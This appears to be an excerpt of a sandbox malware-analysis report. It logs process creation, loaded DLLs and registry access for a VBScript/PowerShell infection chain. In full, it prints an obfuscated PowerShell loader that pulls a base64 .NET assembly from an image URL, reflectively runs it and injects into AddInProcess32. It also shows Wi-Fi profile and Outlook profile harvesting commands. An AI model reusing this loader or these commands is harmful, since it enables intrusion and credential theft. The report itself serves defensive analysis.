Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138', 'https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.drows/17.93.321.39//:ptth' , '1' , '\\tsclient\C\Program Files\' , 'aburrar','AddInProcess32',''))} }"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "\\tsclient\C\Program Files\aburrar.vbs"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ifmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasmontr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: authfwcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcmonitor.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3cfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3api.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: onex.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappprxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: hnetmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netshell.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netsetupapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netiohlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: httpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshipsec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: polstore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winipsec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshwfp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2pnetsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2p.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rpcnsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: whhelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlancfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlanapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wshelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: peerdistsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wcmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mobilenetworking.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprmsg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: msasn1.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

VBScript performs obfuscated calls to suspicious functions

Source:

